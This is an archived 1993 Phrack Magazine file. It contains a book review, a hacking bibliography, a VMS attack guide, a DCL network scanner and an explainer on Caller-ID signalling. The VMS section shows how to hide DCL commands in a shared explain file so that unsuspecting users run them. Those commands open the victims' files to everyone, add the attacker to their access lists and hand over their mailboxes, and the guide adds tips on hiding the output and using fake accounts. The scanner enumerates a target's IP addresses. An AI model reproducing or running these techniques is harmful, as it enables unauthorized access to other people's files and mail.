home *** CD-ROM | disk | FTP | other *** search
/ Gold Medal Software 3 / Gold Medal Software - Volume 3 (Gold Medal) (1994).iso / misc / phrack43.arj / P43-05 < prev    next >
Text File  |  1993-07-03  |  43KB  |  929 lines

  1.                          ==Phrack Magazine==
  2.  
  3.               Volume Four, Issue Forty-Two, File 5 of 27
  4.  
  5.  
  6.                            //   //  /\   //   ====
  7.                           //   //  //\\ //   ====
  8.                          ==== //  //  \\/   ====
  9.  
  10.                      /\   //  // \\    //  /===   ====
  11.                     //\\ //  //   //  //   \=\   ====
  12.                    //  \\/    \\ //  //   ===/  ====
  13.  
  14.                                 (cont)
  15.  
  16. ******************************************************************************
  17.  
  18.     `'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'
  19.     '`                                            '`
  20.     `'             Approaching Reality:           `'
  21.     '`             ~~~~~~~~~~~~~~~~~~~~           '`
  22.     `'  A review of the new book Approaching Zero `'
  23.     '`  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ '`
  24.     `'                by Aleph One                `'
  25.     '`                ~~~~~~~~~~~~                '`
  26.     `'                                            `'
  27.     '`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`
  28.  
  29.      When I started to read this book, I expected to read one more of the
  30. series of books that claim to be the "definitive history of the computer
  31. underworld" and the "first book to define the technological subculture of
  32. phreaking, hacking, and virus writing".  After all what does a guy that
  33. writes for GQ, The Hollywood Reporter, Variety and Time know about the
  34. computer underground?  Well to my surprise the authors, Paul Mungo and
  35. Bryan Clough (a member of the Virus Strategy Group, which is coordinated by
  36. New Scotland Yard's Computer Crime Unit), did a pretty good job at presenting
  37. the facts as they are.  For the first time I heard a reporter and a
  38. computer crime expert give real figures at how much computer crime has
  39. really cost.  Other than a few minor technical errors and the fact that
  40. they fail to mention some people and groups (especially in the virus
  41. section), the book was enjoyable to read.
  42.  
  43.     The book covers the history of the underground starting with its
  44. beginnings in the 60's, from phreaking to the adventures of Captain
  45. Crunch and the rest of the bunch to the not so long ago Operation Sundevil
  46. and the raids all over the country on members of the LOD, MOD and DPAC.
  47. It also goes through the events that led to the German hackers spy trials,
  48. and to the new generation of virus writers that are creating the new kind
  49. of living organisms that roam cyberspace.  They also discuss the gray
  50. scale that categorizes hackers, from the good hackers to the bad to the
  51. ones not that bad... those who are in it for profit and those who are
  52. in it to learn.  Hopefully all the readers of the book, hackers, security
  53. specialists, reporters and the general public will get a better
  54. understanding of what motivates hackers to do what they do by learning
  55. where they come from. To the hackers let them learn not to repeat their
  56. past errors.
  57.  
  58.  
  59.      I hope that the time of raids and sting operations has passed, but
  60. the late developments in the Washington 2600 meeting have pulled a shadow
  61. over my hopes.  Has no one learned?  Have the SS and FBI nothing better to
  62. do?  Just a few moths back someone pulled one of the greatest scams of all
  63. by setting up a fake ATM and stealing a few thousand dollars.  These are
  64. the kind of people the authorities should be after.  And to the hacker,
  65. don't sell yourself!  Remember this is a learning trip, once you start
  66. forgetting to learn and start making money out of it, it is just another
  67. job, an illegal one at that.
  68.  
  69.      Approaching Zero was an exciting and interesting surprise.  It has
  70. given me the hint that maybe someone out there understands and I hope that
  71. everyone that reads it (and you must, you must read and learn all you can)
  72. will also understand.  I just leave you with these words:  Hacking comes
  73. from the heart - sometimes in the form of an obsession, sometimes in the
  74. form of a hobby - once that dies, there is nothing left to do.  No more
  75. traveling trough the nets!  No more exploring new systems!  You might as
  76. well turn the power off.
  77.  
  78. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  79.  
  80.  What fallows is a list of books, papers and articles for those that
  81. want to know a little more of how the media portrays us, and a little more
  82. about the story of hacking in general.
  83.  
  84.  
  85.      Books:
  86.      ~~~~~~
  87.  
  88.    - "Approaching Zero" by Paul Mungo & Bryan Clough. Random House
  89.    1992.
  90.  
  91.    - "Beating the System" by Owen Bowcott & Sally Hamilton. London:
  92.     Bloomsbury, 1990.
  93.  
  94.    - "Computer Viruses - A High-Tech Disease" by Ralf Burger. Grand
  95.     Rapids, MI: Abacus, 1988.
  96.  
  97.    - "The Hackers' Handbook" by Hugo Cornwall. London: Century
  98.     Communications, 1985.
  99.  
  100.    - "Computers Under Attack" by Peter Denning. Addison Wesley, 1990.
  101.  
  102.    - "Profits of Deceit" by Patricia Franklin. London: William
  103.     Heinemann, 1990.
  104.  
  105.    - "Cyberpunk" by Katie Hafner & John Markoff. London: Fourth Estate,
  106.     1991.
  107.  
  108.    - "Out of the Inner Circle" by Bill Landreth (aka The Cracker).
  109.     Redmond, WA.: Tempus Books, 1985.
  110.  
  111.    - "Sillicon Valley Fever" by Judith K. Larsen & Everett M. Rogers.
  112.     London: George Allen & Unwin, 1985.
  113.  
  114.    - "Computer Viruses" by Ralph Roberts. Greensboro, NC: Compute! Books,
  115.     1988.
  116.  
  117.    - "The Cuckoo's Egg" by Clifford Stoll. New York: Doubleday, 1989.
  118.  
  119.    - "Spectacular Computer Crimes" by Buck BloomBecker. Dow Jones-Irwin,
  120.     1990.
  121.  
  122.    - "The New Hacker's Dictionary" by Eric Raymond. MIT Press, 1983.
  123.  
  124.    - "The Hacker Crackdown" by Bruce Sterling. Bantam Books, 1992.
  125.  
  126.    - "The Little Black Book of Computer Viruses" by Mark Ludwig. American
  127.     Eagle Publications, 1991.
  128.  
  129.    - "Artificial Life" by Steven Levy. Panthenon, 1992. (For those virus
  130.     writers out there, use your tallen to create life.)
  131.  
  132.  
  133.      Articles & Papers:
  134.      ~~~~~~~~~~~~~~~~~~
  135.  
  136.    - "Crime and Puzzlement" by John Perry Barlow. Whole Earth Review,
  137.     Fall 1990: 44-57.
  138.  
  139.    - "The Casino Virus - Gambling with Your Hard Disk" by Jim Bates.
  140.     Virus Bulletin, March 1991: 15-17.
  141.  
  142.    - "The TP Viruses" by Vesselin Bontchev. Postings to Virus-L 1990.
  143.  
  144.    - "In Defense of Hackers" by Craig Bromberg. The New York Times
  145.     Magazine, April 21, 1991.
  146.  
  147.    - "Bulgaria - The Dark Country" by Bryan Clough. Virus Bulletin,
  148.     December 1990: 9-11.
  149.  
  150.    - "Voice Mail Computer Abuse Prosecution: United States v. Doucette
  151.     a/k/a Kyrie" by William J. Cook. Safe Computing Proceedings of the
  152.     Fourth Annual Computer Virus & Security Conference, 1991, Organized
  153.     by National Computing Corporation.
  154.  
  155.    - "Invasion of the Data Snatchers!" by Philip Elmer-De Witt. Time,
  156.     September 26, 1988: 63.
  157.  
  158.    - "Data Exchange and How to Cope with This Problem: The Implication
  159.     of the German KGB Computer Espionage Affair" by Hans Gliss. Paper
  160.     presented at Securicom Italia, October 1989.
  161.  
  162.    - "The Implications of the SPANet Hack." Computers Fraud & Security
  163.     Bulletin, Vol. 10, No. 2, 1987.
  164.  
  165.    - "The Brain Virus: Fact and Fantasy" by Harold J. Highland. Computers
  166.     & Security, August 1988: 367-370.
  167.  
  168.    - Computer Viruses - A Post Modern." Computer & Security, April 1988:
  169.     117-184.
  170.  
  171.    - "Terminal Delinquents" by Jack Hitt & Paul Tough. Esquire, December
  172.     1990.
  173.  
  174.    - "The Social Organization of the Computer Underground" by Gordon R.
  175.     Meyer. M.A. Thesis Submitted to the Graduate School, August 1989.
  176.  
  177.    - "Satanic Viruses" by Paul Mungo. GQ, February 1991: 126-130.
  178.  
  179.    - "Secrets of the Little Blue Box" by Ron Rosenbaum. Esquire, October
  180.     1971, Collected in Travels with Dr. Death. New York: Viking Penguin,
  181.     1991.
  182.  
  183.    - "The Worm Program - Early Experience with a Distributed
  184.     Computations" by John F. Shoch. Communications of the ACM, Vol. 25,
  185.     No. 3, March 1982.
  186.  
  187.    - "The Search for Den Zuk" by Fridrik Skulason. Virus Bulletin,
  188.     February 1991: 6-7.
  189.  
  190.    - "Crisis and Aftermath" by Eugene H. Spafford. Communications of the
  191.     ACM. Vol. 32, No. 6, June 1989.
  192.  
  193.    - "GURPS Labor Lost: The Cyberpunk Bust" by Bruce Sterling, Effector,
  194.     September 1991: 1.
  195.  
  196.    - "Stalking the Wily Hacker" by Clifford Stoll. Communications of the
  197.     ACM. Vol. 31, No. 5, May 1988.
  198.  
  199.    - "The Kinetics of Computer Virus Replication." by Peter S. Tippett.
  200.     FundationWare, March 1990.
  201.  
  202.    - "The General and Logical Theory of Automata" by John L. von Neumann.
  203.     Hixon Symposium, September 1948.
  204.  
  205.    - "Here Comes the Cyberpunk" by Eden Restored. Time, February 8, 1993:
  206.     58-65.
  207.  
  208.    - "Surfing Off the Edge" by Richard Begar. Time, February 8, 1993: 62.
  209.  
  210.    - "Can Hackers Be Sued for Damages Caused by Computer Viruses?" by
  211.     Pamela Samuelson. Communications of the ACM. Vol. 32, No. 6, June
  212.     1989.
  213.  
  214.    - "Viruses and Criminal Law" by Michael Gemignani. Communications of
  215.     the ACM. Vol. 32, No. 6, June 1989.
  216.  
  217.    - "Password Cracking: A Game of Wits" by Donn Seeley. Communications
  218.     of the ACM. Vol. 32, No. 6, June 1989.
  219.  
  220.    - "The Cornell Commission: On Morris and the Worm" by Ted Eisenberg,
  221.     David Gries, Juris Artmanis, Don Holcomb, M. Stuart Lynn & Thomas
  222.     Santoro. Communications of the ACM. Vol. 32, No. 6, June 1989.
  223.  
  224.    - "Desperately Seeking Cyberspace" by Paul Saffo. Personal Computing,
  225.     May 1989: 247-248.
  226.  
  227.    - "Secrets of the Software Pirates" by Bylee Gomes. Esquire, January
  228.     1982: 58-64.
  229.  
  230.    - "Trouble in Cyberspace" by Willard Uncapher. The Humanist,
  231.     September/October 1991: 5-14,34.
  232.  
  233.    - "Is Computer Hacking a Crime?" Capture of a discussion held on the
  234.     WELL. Harper's Magazine, March 1990: 45-57.
  235.  
  236.    - "The United States vs. Craig Neidorf" by Dorothy E. Denning.
  237.     Communications of the ACM, Vol. 34, No. 3, March 1991: 24-32.
  238.  
  239.    - "Colleagues Debate Denning's Comments." Communications of the ACM.
  240.     Vol. 34, No. 3, March 1991: 33-41.
  241.  
  242.    - "Denning's Rebutal" by Dorothy E. Denning. Communications of the
  243.     ACM. Vol. 34, No. 3, March 1991: 42-43.
  244.  
  245.    - "Coming into the Country" by John P. Barlow. Communications of the
  246.     ACM. Vol. 34, No. 3, March 1991: 19-21.
  247.  
  248.    - "Off the Hook" by Julian Dibbell. Village Voice, August 21, 1990: 8.
  249.  
  250.    - "On Line and Out of Bounds" by Julian Dibbell. Village Voice, July
  251.     24, 1990:27-32.
  252.  
  253.   - "Hi-Tech Mall Crawl" by Julian Dibbell. Village Voice. March 1990: 12
  254.  
  255.   - "Samurai Hackers" by Lynda Edwards. Rolling Stone, September 19,
  256.    1991: 67-69.
  257.  
  258.   - "Crackdown on hackers `may violate civil rights'" by Dan Charles.
  259.    New Scientist, July 21, 1990: 22.
  260.  
  261.   - "United States v. Zod." The Economist, September 1, 1990: 23.
  262.  
  263.   - "Drop the Phone." Time, January 9, 1989: 49.
  264.  
  265.   - "Computer Recreations (Core War)" by A. K. Dewdney. Scientific
  266.    American, May 1984: 14-21.
  267.  
  268.   - "Computer Recreations (Core War)" by A. K. Dewdney. Scientific
  269.    American, March 1985: 14-23.
  270.  
  271.   - "Computer Recreations (Core War)" by A. K. Dewdney. Scientific
  272.    American. March 1989: 110-113.
  273.  
  274.   - "Computer Security: NAS Sounds the Alarm" by Eliot Marshall. Science,
  275.    Vol. 250: 1330.
  276.  
  277.   - "Students Discover Computer Threat" by Gina Koda. Science, Vol. 215,
  278.    5 March, 1982: 1216-1217.
  279.  
  280.   - "A nationwide Computer-Fraud Ring Is Broken Up." The New York Times
  281.    National, Sunday, April 19, 1992.
  282.  
  283.   - "Hackers: Is a Cure Worse than the Disease?" by Mark Lewyn. Business
  284.    Week, December 4, 1989: 37-38.
  285.  
  286.   - "Computer Hacking Goes to Trail" by William F. Allman. U.S. News &
  287.    World Report, January 22, 1990: 25.
  288.  
  289.   - "Morris Code: by Katie Hafner. The New Republican, February 19, 1990:
  290.    15-16.
  291.  
  292.   - "Hackers Intentions Key to Court Case" by David Lindley. Nature. Vol.
  293.    340, August 3, 1989: 329.
  294.  
  295.   - "Problems of Security" by David Lendley. Nature. Vol. 340. July 27,
  296.    1989: 252.
  297.  
  298.   - "Hostile Takeovers" by Paul Wallich. Scientific American, January
  299.    1989: 22-23.
  300.  
  301.   - "The Worm's Aftermath" by Eliot Marshall. Science, Vol. 242, November
  302.    25, 1988: 1121-1122
  303.  
  304.   - "Researcher Fear Computer Virus' Will Slow Use of National Network"
  305.    by Calvin Sims.  The New York Times, Monday, November 14, 1998: B6.
  306.  
  307.   - "Networked Computers Hit by Intelligent `Virus'" by Joseph Palca &
  308.    Seth Shulman. Nature, Vol. 336, November 10, 1988: 97.
  309.  
  310.   - "The Science of Computing: Computer Viruses" by Peter J. Denning.
  311.    American Scientist, Vol. 76, May-June 1988:236-238.
  312.  
  313.   - "Cyberpunks and the Constitution" by Philip Elmer-Dewitt. Time, April
  314.    8, 1991:81.
  315.  
  316.   - "Plan to outlaw hacking." Nature, Vol. 341, October 19, 1989: 559.
  317.  
  318.   - "Computer System Intruder Plucks Passwords and Avoids Detection" by
  319.    John Markoff. The New York Times National, Monday, March 19, 1990.
  320.  
  321.   - "Networked Computer Security" by S.J. Buchsbaum. Vital Speeches of
  322.    the day. December 15, 1991: 150-155.
  323.  
  324.   - "Halting Hackers." The Economist. October 28, 1989: 18.
  325.  
  326.   - "Revenge of the Nerds" by Nocholas Martin. The Washington Monthly,
  327.    January 1989: 21-24.
  328.  
  329.   - "Greater awareness of security in aftermath of computer worm" by Seth
  330.    Shulman & Joseph Palce. Nature, Vol. 336, November 1988: 301.
  331.  
  332.   - "Avoiding Virus Hysteria" by Patrick Honan. Personal Computing, May
  333.    1989: 85-92.
  334.  
  335. *****************************************************************************
  336.  
  337.              {----------------------------------------------}
  338.              {                                              }
  339.              {       VMS/VAX Explain Files Explained        }
  340.              {                     or                       }
  341.              {      Security Holes in the VAX and DCL       }
  342.              {                                              }
  343.              {            By: The Arctic Knight             }
  344.              {                                              }
  345.              {----------------------------------------------}
  346.  
  347.      VAX/VMS hacking has declined in popularity over the years due to the
  348. abundance of UNIX machines now available. It has even gotten bad press from
  349. fellow hackers. Included in this file is a security hole the size of , oh,
  350. any of the older IBM mainframes. With a little curiosity, persistence, and
  351. down right stubbornness I came across this rather obvious hole in the system.
  352. However, this hole may be so obvious that it has remained relatively hidden
  353. until now, especially since the decline of DCL users.
  354.      On most VAX systems, there is something called explain files.  These are
  355. usually help files that are made up by the system operators or borrowed from
  356. somewhere to help better explain the way certain features of the system work,
  357. whether they be general VAX commands, or system-specific programs.
  358.      When you are in your account (Presumably, a fake one, as this can be
  359. tracked down if you are foolish) type:
  360.  
  361. $ explain index
  362.  
  363.      and you will get a list of all the explain files on your system. Go ahead
  364. and take a look around these just to get a feel of what it looks like.  It
  365. should be a menu driven list of text files to view or programs to run(!!!).
  366.      Most system operators only set this up to show various text files
  367. describing commands like mentioned above. However, DCL .com files can be run
  368. from explain files as well. Now comes the fun. Many systems will also allow
  369. users to set up there own explain file. A really nice way to make it easy for
  370. other users to view text files or run programs that you have set for group or
  371. world access.
  372.      The first thing someone needs to do is make a file called INTRO.LKT which
  373. will contain whatever introduction text that you would like displayed before
  374. your explain file menu is displayed(i.e. you might have a description of
  375. yourself, your duties, or a funny poem, or WHATEVER YOU WANT THAT CAN BE
  376. CONTAINED IN A TEXT FILE!!!!)
  377.      You can use any editor to do this like EDT(a line editor) or TPU(a full
  378. screen editor). You will need to type something along these lines to create the
  379. file:
  380.  
  381. $set vt=100         !if using a full screen editor like TPU
  382. $edit/tpu intro.lkt
  383.  
  384.      After you are finished typing in the file, if you used TPU (A much better
  385. choice than EDT), you press <CONTROL-Z> to save the file. Now you must create
  386. a file called INDEX.LKI which will contain the file directories, filenames,
  387. and short descriptions of the files that you want to have displayed. You do
  388. this in the same manner as above, by entering an editor, and creating the file.
  389.  
  390. $edit/tpu index.lki
  391.  
  392.      Now, in this file the lines should look like the following:
  393. (File Directory)         (Filename)      (File Description)
  394.  
  395. Phrack41.txt  A complete copy of Phrack 41 for your enjoyment.
  396. User:[aknight.hack]vms.txt A guide to hacking VMS systems.
  397. Temp$1:[aknight.ftp]ftplist.txt A list of FTP servers in-state.
  398.  
  399.      Now, to explain these three lines. The first one will look for the program
  400. in your main directory. The second line will look for the program listed after
  401. it on the device called USER and in the HACK directory within the AKNIGHT
  402. directory. The final line will look on the device called TEMP$1 in the FTP
  403. directory within the AKNIGHT directory. Adding DCL programs will be explained
  404. in a minute, but first lets get this up and running.
  405.      Now, that you have typed in the text files you want, and saved this file
  406. you need to set the protection on your main directory and any others that need
  407. accessing like the text files to group and world access. For the above example
  408. one would want to type(assuming you are in your main directory):
  409.  
  410. $set prot=(g:re,w:re) user:[000000]aknight.dir     !This is my main directory
  411. $set prot=(g:re,w:re) user:[aknight.hack]
  412. $set prot=(g:re,w:re) temp$1:[000000]aknight.dir   !My second storage device
  413. $set prot=(g:re,w:re) temp$1:[aknight.ftp]
  414. $set prot=(g:r,w:r)   phrack41.txt                 !Giving privs to read only
  415. $set prot=(g:r,w:r)   user:[aknight.hack]vms.txt
  416. $set prot=(g:r,w:r)   temp$1:[aknight.ftp]ftplist.txt
  417.  
  418.      Now, if you type:
  419.  
  420. $explain aknight              ! (my username in this instance,your normally)
  421.  
  422.      You should get a print out to screen of your INTRO.LKT file and then a
  423. message along the lines of "Hit <return> to continue". When you hit return a
  424. menu will appear very similar to the normal explain file menu except with your
  425. files listed and their descriptions which were accessed by the computer from
  426. your INDEX.LKI file. It would look like this(or something similar) in the above
  427. example.
  428.  
  429.    {a print out of my INTRO.LKT file...}
  430.  
  431. Hit <RETURN> to continue
  432.  
  433.                              EXPLAIN AKNIGHT
  434. ================================================================================
  435. (A) PHRACK41  T-A complete copy of Phrack 41 for your enjoyment.
  436. (B) VMS       T-A guide to hacking VMS systems.
  437. (C) *EXPLAIN/USER AKNIGHT FTPLIST
  438.               T-A list of FTP servers in-state.
  439. (Q) TERMINATE THIS PROGRAM
  440. ================================================================================
  441. T = Text Display P = Program to be run
  442. (* = Related Information)
  443. Choose A-C, Q, oe type HELP for assistance.
  444.  
  445.      Now you have an explain file. Pressing A-C will print those files to
  446. screen with pauses at each page if set up on your system/account to do so. I
  447. typed out number C the way I did, because when it has to access a directory
  448. other than it's main one, it will usually do this. I think there is away around
  449. this, but to be quite honest I haven't bothered figuring it out yet. When you
  450. quit, you will be dropped back off at your main prompt. The reason you need to
  451. set your protections, is because even thought from your account, it may look
  452. like it is working, if you don't set your protections as described above,
  453. NO ONE else will be able to view it!!
  454.      Now, comes the fun part. Putting DCL .COM files into your explain file.
  455. These are put into your index just like any text file. So you could type up a
  456. program to let someone copy the public files you have in your account to their
  457. directory, or something similar. The security flaw comes in here and it is
  458. a big one. Since a user is accessing your explain file from their account, any
  459. file that they run, issues commands in their account. So, one might plant a
  460. line in the middle of the above program that say something like:
  461.  
  462. $set def sys$login                   !Returns them to their main directory.
  463. $set prot=(g:rwed,w:rwed) *.*;*      !Their files are now read, write, execute,
  464.                                      !and deleteable by anyone, including you.
  465.  
  466.      Here is another idea. Say you create a text reader in DCL, to allow people
  467. to jump around in the text files you have, skip pages, etc. called TYPE.COM in
  468. your main directory. Anytime you can fool people into thinking that the
  469. computer is taking a little time to think, you can insert some major commands,
  470. i.e. when it is skipping pages, or coping files, which almost takes no time at
  471. all in reality. I STRONGLY suggest starting any program you plan to nest
  472. commands like this into with:
  473.  
  474. $set noverify
  475.  
  476.      Which will make sure that the program lines don't get printed to the
  477. screen as they are running. Another important command to know is the following
  478. which will cause the next text output from the VAX to be sent to a NULL device,
  479. so it will essentially be lost and not printed to the screen. So, if one is
  480. accessing someone's mailbox, you don't want a messaging appearing on screen
  481. saying that you have entered VAX/VMS mail or whatever. The command is:
  482.  
  483. $assign nl:sys$output/user
  484.  
  485.      If you forget the /user it will send the output to the null device for the
  486. session, instead of just one line.
  487.      Some other things one might do would be to add yourself to someone's
  488. ACL(access control list) by typing:
  489.  
  490. $set acl/acl=(ident=[aknight],access=control) *.*;*
  491.  
  492.      Now, this will give you access to all their files just as if you were the
  493. user, however if they bother to ever do a dir/prot command your username will
  494. be printed all over the screen, so one would suggest if you must do this, to
  495. use a fake account. Same with this below command:
  496.  
  497. $assign nl:sys$output/user
  498. $mail set write aknight
  499.  
  500.      The second line will give me read and write access to someone's mailbox,
  501. but once again if they bother to check their mailbox protections your username
  502. will be displayed.
  503.      In case, you haven't realized this yet, this all has A LOT of potential,
  504. and what I have mentioned here is just the tip of the iceberg and really mostly
  505. small and even foolish things to do, but the fact comes down to ANYTHING the
  506. user can do in their account, YOU can do in there account if you know the right
  507. commands and have the patience to nest them into a .COM file well enough.
  508.      When you have created the .COM file and added it to the INDEX.LKI file,
  509. then you will need to set the protection of the file like so:
  510.  
  511. $set prot=(g:e,w:e) type.com                  !Execution only. No read privs.
  512.  
  513.      You now have it a fully functional explain file that is only held down by
  514. your imagination.
  515.  
  516.      Remember, malicious actions aren't the sign of a true hacker, so don't
  517. delete a users complete directory just because you want to show of your power.
  518. Most people won't be impressed.  If your a SYSOP, fix this DAMN HOLE!!! And if
  519. your a user well, learn the system quickly, explore, absorb, and discover some
  520. other hole before the above SYSOP patches this one......
  521.  
  522.   COMMENTS, QUESTIONS, ADDITIONS, ETC can be sent to PHRACK LOOPBACK. ENJOY!!
  523. {______________________________________________________________________________}
  524.  
  525. *****************************************************************************
  526.  
  527.                                A Internet Scanner
  528.  
  529.                                   (War Dialer)
  530.  
  531.                                        by
  532.  
  533.                                     MadHatter
  534.  
  535.  
  536.  
  537. Purpose of this program
  538. ~~~~~~~~~~~~~~~~~~~~~~~
  539.  
  540.      Remember those scanner, war dialer programs everyone used to scan areas of
  541. telephone numbers to find unknown hosts?  Well, now your on the net and you're
  542. targeting some certain establishment, and you know which part of the net they
  543. own, but the hell if you know what the actual IP addresses of their hosts are...
  544. Telneting to NIC.DDN.MIL is no help, their records are a year old...  Might as
  545. well have been 10 yrs ago...  So you type every possible IP address in.  Right?
  546. After a while that shit gets tiring...  Well, hell let the computer do it,
  547. that's what its there for.  More speed, no sore fingers, no bitching, and it
  548. runs when you're not there.  Almost perfect.....
  549.  
  550.  
  551. Program Details
  552. ~~~~~~~~~~~~~~~
  553.      DCL is the language and it runs on Vaxen.  A,B,C,D respectively represent
  554. the starting IP address.  E,F,G,H respectively represent the ending IP address
  555. (ex. If you what to start at 4.1.1.1 and end at 6.1.1.1 then a = 4, B = 1,
  556. etc.,  E = 6, F = 1, etc.)
  557.      The prog creates a data file (FINAL.DAT) that holds all successful
  558. connections.  If you run it in batch, it also creates a .log file.  This by
  559. far takes up most of the memory.  When the program quits, delete it.
  560. This prog is just one big loop.  It finds a good telnet address and then
  561. reIFINGERs there, saving it.
  562.  
  563.  
  564. Program Changes
  565. ~~~~~~~~~~~~~~~
  566.  
  567.      If you run it in batch, then you might (probably) have to define where
  568. the IFINGER or FINGER program is.  Make sure it is the one for FINGERing remote
  569. hosts, the commands for it vary.  Why do you have to define it?  Because the
  570. dumb-ass sysop couldn't think of why anyone would want to use it in batch.
  571.  
  572.  
  573. Problems
  574. ~~~~~~~~
  575.  
  576.      The IFINGER (FINGER) command might not connect to some hosts from your
  577. system.  Why can you TELNET there but no IFINGER?  It all probably has to do
  578. with the other host (it has tight security, too far away, doesn't support
  579. FINGERing, etc.).
  580.  
  581.  
  582. No Solutions (Just one)
  583. ~~~~~~~~~~~~~~~~~~~~~~~
  584.  
  585.      You say if I can TELNET to more places than IFINGERing, why not base the
  586. scanner on the TELNET command?  Two reasons: (1) the security with the TELNET
  587. command requires its output goes to a terminal, never to run in batch; (2) the
  588. TELNET command does not give the character address (at least not on the system I
  589. use).  To have the character address is valuable to me.  The program lists the
  590. IP address, the character address, then whatever finger came up with.
  591.      When running in batch, the program will quit eventually (do to MAX CPU
  592. time or exceeded disk quota).  This can be a pain (especially if its CPU time),
  593. you can always get more memory.  Try changing the file specifics in the prog,
  594. and run many versions of it at once, to get as much cpu time as possible.
  595. For memory, clear your account, or get more of them.  Another problem is when
  596. your program has stopped and you have nothing in FINAL.DAT file.  So where do
  597. you start the batch off again?  All I can say is count the number of failed
  598. connections and add 'em to your previous start address, start at that address.
  599.  
  600.  
  601. More Ideas
  602. ~~~~~~~~~~
  603.  
  604.      If you want the net area of an establishment then ftp to NIC.DDN.MIL and
  605. get the hosts listing, or TELNET there and search for the name.
  606.      Some areas of the net do not like to be scanned.  Your sysop will get nasty
  607. calls, and then you will get nasty e-mail if you for instance scan the Army
  608. Information Systems Center.  Or any other government org.  Of course, this
  609. program wouldn't hurt them at all, it would bounce back.  They use firewalls.
  610. But they will bitch anyway.
  611.      After you run this program for awhile, you'll notice the net is really
  612. a big empty place.  Hosts are few and far between (at least address wise).
  613. Are you agoraphobic yet?  What do you do with all this room?
  614.  
  615.  
  616. MadHatter
  617.  
  618.  
  619. *----------------------------CUT HERE------------------------------------------*
  620. $ A = 0
  621. $ B = 0
  622. $ C = 0
  623. $ D = 0
  624. $ E = 257
  625. $ F = 0
  626. $ G = 0
  627. $ H = 0
  628. $ D = D - 1
  629. $ IFINGER := $VMS$UTIL:[IFINGER]FINGER.EXE;1
  630. $ CREATE FINAL.DAT
  631. $ LOOP1:
  632. $     ON SEVERE_ERROR THEN GOTO SKIP
  633. $     D = D + 1
  634. $     IFINGER @'A'.'B'.'C'.'D'
  635. $     ON SEVERE_ERROR THEN GOTO SKIP
  636. $     ASSIGN TEMPFILE.DAT SYS$OUTPUT
  637. $     WRITE SYS$OUTPUT "["'A'"."'B'"."'C'"."'D'"]"
  638. $     IFINGER @'A'.'B'.'C'.'D'
  639. $     DEASSIGN SYS$OUTPUT
  640. $     APPEND TEMPFILE.DAT FINAL.DAT
  641. $     DELETE TEMPFILE.DAT;*
  642. $ SKIP:
  643. $     IF A .EQ. E THEN IF B .EQ. F THEN IF C .EQ. G THEN IF D .EQ. H THEN EXIT
  644. $     IF D .EQ. 256 THEN GOTO LOOP2
  645. $     IF C .EQ. 256 THEN GOTO LOOP3
  646. $     IF B .EQ. 256 THEN GOTO LOOP4
  647. $     GOTO LOOP1
  648. $ LOOP2:
  649. $      D = 0
  650. $      C = C + 1
  651. $      GOTO LOOP1
  652. $ LOOP3:
  653. $      C = 0
  654. $      B = B + 1
  655. $      GOTO LOOP1
  656. $ LOOP4:
  657. $      B = 0
  658. $      A = A + 1
  659. $      GOTO LOOP1
  660. $ EXIT
  661. *------------------------------------CUT HERE----------------------------------*
  662.  
  663. *****************************************************************************
  664.  
  665.        Caller Identification
  666.        by (Loq)ue & Key
  667.        3/20/93
  668.  
  669.  
  670.         Caller-Identification (CID), is a relatively new service being
  671.    offered by several carriers.  It is part of a total revamp of the
  672.    telephone network, with the telephone companies trying to get people
  673.    to spend more money on their systems.  CID is just one of the newer
  674.    CLASS services, which will eventually lead into ISDN in all areas.
  675.  
  676.         Caller-ID allows a receiving party to see the number that is
  677.    calling before they pick up the phone.  It can be used for everything
  678.    from pizza delivery to stopping prank callers.  One scenario
  679.    made possible from CID is one where a salesman dials your number,
  680.    you look on a little box and see that it is someone you don't want
  681.    to talk to, so you promptly pick up the phone, say "Sorry, I don't
  682.    want any *** *** products" and slam down the receiver.  Ah, the
  683.    wonders of modern technology.
  684.  
  685.         Caller-ID starts by a person making a call.  When the person
  686.    dials a number, the local switch rings the calling number once, and
  687.    then sends a specially encoded packet to the number, after checking
  688.    to see if that caller has access to the Calling Number Delivery
  689.    service.
  690.  
  691.         The packet can contain any information, but currently it holds
  692.    a data stream that contains flow control, and error checking data.
  693.    The specifications state that several signals can exist, however,
  694.    only the Caller-ID signal is used currently.
  695.  
  696.  The CID packet begins with a "Channel Seizure Signal".  The
  697.    CSC is 30 bytes of hex 55, binary 01010101, which is equivalent to
  698.    250 milliseconds of a 600 hz square wave.
  699.  
  700.         The second signal is the "Carrier Signal," which lasts for 150
  701.    milliseconds, and contains all binary 1's. The receiving equipment
  702.    should have been "woken-up" by the previous signal and should now
  703.    be waiting for the important information to come across.
  704.  
  705.         Next are the "Message Type Word", and the "Message Length Word".
  706.    The MTW contains a Hex $04 for CID applications, with several other
  707.    codes being planned, for example $0A to mean message waiting for
  708.    a pager.  The MLW contains the binary equivalent of the number of
  709.    digits in the calling number.
  710.  
  711.         The data words come next, in ASCII, with the least significant
  712.    digit first.  It is padded in from with a binary 0, and followed by
  713.    a binary 1.  A checksum word comes after that, which contains the
  714.    twos-complement sum of the MLW and data words.
  715.  
  716.  The checksum word usually signals the end of the message from
  717.     the CO, however, other messages for equipment to decode can occur
  718.     afterwards.
  719.  
  720.         Caller-ID can usually be disabled with a 3 digit sequence,
  721.    which can vary from CO to CO.  Several of these have been mentioned
  722.    in the past on Usenet, in comp.dcom.telecom.
  723.  
  724.         Caller-ID chips are available from many sources, however,
  725.    remember that you must connect these chips through an FCC-approved
  726.    Part-68 Interface.  Several of these interfaces are available,
  727.    however they are fairly expensive for an amateur electronics hacker.
  728.  
  729.         If you have any more questions on CID, mail me at the above
  730.    address, or post to comp.dcom.telecom.
  731.  
  732.        Additional Sources from Bellcore:
  733.  
  734.         Nynex Catalog of Technical Information #NIP-7400
  735.         SPCS Customer Premises Equipment Data Interface #TR-TSY-0030
  736.         CLASS Feature: Calling Number Delivery #FSD-02-1051
  737.         CLASS Feature: Calling Number Blocking #TR-TSY-000391
  738.  
  739. *****************************************************************************
  740.  
  741.      THE  "OFFICIAL"  CABLE  TELEVISION  VIDEO  FREQUENCY  SPECTRUM  CHART
